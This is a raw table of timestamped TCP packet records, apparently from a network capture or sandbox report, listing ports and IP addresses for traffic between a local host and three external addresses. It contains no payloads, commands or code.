Dec 9, 2024 08:08:25.322657108 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.322700977 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.322760105 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.322808981 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.323892117 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.323939085 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.323970079 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.324013948 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.324986935 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.325031042 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.325098038 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.325144053 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.326183081 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.326225996 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.326267958 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.326312065 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.327405930 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.327452898 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.327531099 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.327585936 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.328505039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.328603983 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.328645945 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.329708099 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.329751015 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.329802036 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.329925060 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.330898046 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.330945969 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.330967903 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.331011057 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.332061052 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.332106113 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.332127094 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.332143068 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.333221912 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.333271980 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.333308935 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.333352089 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.334362030 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.334408045 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.334459066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.334506989 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.335561991 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.335607052 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.335650921 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.335699081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.336772919 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.336817026 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.336827993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.336865902 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.337951899 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.337955952 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.337966919 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.337966919 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.338052988 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.338064909 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.338093996 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.338112116 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.339071035 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.339128017 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.339178085 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.339242935 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.340270042 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.340289116 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.340332031 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.341435909 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.341520071 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.341562986 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.342556953 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.342597008 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.342698097 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.342751980 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.343736887 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.343863010 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.343909025 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.344997883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.345017910 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.345062971 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.346088886 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.346204042 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.346257925 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.347275019 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.347321987 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.347385883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.348057985 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.348439932 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.348551989 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.348592997 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.349714994 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.349761963 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.349764109 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.349797964 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.350780010 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.350828886 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.350893021 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.350933075 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.351974964 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.352027893 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.352207899 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.352253914 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.353149891 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.353195906 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.353254080 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.353478909 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.354302883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.354368925 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.354398012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.354439020 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.355510950 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.355587006 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.355644941 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.355684042 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.356683016 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.356733084 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.356755972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.357604980 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.357836962 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.357886076 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.357940912 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.357988119 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.358998060 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.359045029 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.359340906 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.359904051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.360156059 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.360209942 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.360331059 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.360377073 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.361368895 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.361418962 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.361454964 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.361504078 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.362557888 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.362602949 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.362637997 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.362683058 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.363670111 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.363715887 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.363785028 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.363828897 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.364861012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.364908934 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.365298986 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.365350008 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.366091967 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.366142035 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.366202116 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.366256952 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.367224932 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.367279053 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.367331982 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.368067026 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.368376970 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.368427038 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.368463039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.368515015 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.369553089 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.369627953 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.369687080 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.369743109 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.370707989 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.370764971 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.370824099 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.370871067 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.371942043 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.371999979 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.372061014 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.372199059 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.373111010 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.373171091 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.373354912 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.373464108 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.374289989 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.374346018 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.374408007 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.374459982 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.375406981 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.375449896 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.375458002 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.375488997 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.376590967 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.376698971 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.376753092 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.377804995 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.377948046 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.377998114 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.378911972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.378959894 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.379030943 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.379089117 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.380141973 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.380183935 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.380187035 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.380269051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.381294012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.381340981 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.381463051 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.381736994 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.382435083 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.382499933 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.382534981 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.382575989 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.384733915 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.384748936 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.384808064 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.384819031 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.384833097 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.385776043 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.387093067 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.387156010 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.387164116 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.387177944 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.387233019 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.396980047 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.457030058 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.457077980 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.457325935 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.457668066 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.457683086 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.514339924 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.514425993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.514636040 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.514890909 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.514971972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.515017986 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.516040087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.516123056 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.516180992 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.517231941 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.517287970 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.517319918 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.518390894 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.518450022 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.518569946 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.519591093 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.519655943 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.519712925 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.520060062 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.520756006 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.520935059 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.520982981 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.521905899 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.522034883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.522085905 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.523082018 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.523145914 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.523199081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.524245024 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.524377108 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.524425983 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.525444984 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.525554895 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.525604010 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.526622057 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.526669979 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.526700974 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.527081966 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.527749062 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.527816057 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.527851105 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.527920008 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.528928995 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.528978109 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.529019117 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.529062033 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.530580044 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.530657053 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.530682087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.530719995 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.531559944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.531605005 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.531745911 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.531797886 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.532496929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.532541990 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.532577991 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.532630920 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.533693075 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.533735991 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.533798933 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.533842087 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.534837008 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.534882069 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.534919024 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.534961939 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.536014080 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.536062956 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.536070108 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.536111116 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.537148952 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.537189960 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.537245035 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.537286997 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.538336039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.538381100 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.538427114 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.538470030 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.539465904 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.539506912 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.539573908 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.539623022 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.540672064 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.540715933 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.540745020 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.540786982 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.541855097 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.541898966 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.541946888 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.541992903 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.542999983 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.543039083 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.543045998 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.543082952 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.544178963 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.544225931 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.544267893 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.544310093 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.545445919 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.545495987 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.545551062 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.545593977 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.546560049 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.546602964 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.546638012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.546674013 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.547678947 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.547723055 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.547774076 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.547816038 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.548851013 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.548904896 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.548974991 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.549019098 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.550014019 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.550124884 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.550175905 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.551193953 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.551273108 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.551326036 CET	80	49807	185.215.113.16	192.168.2.4
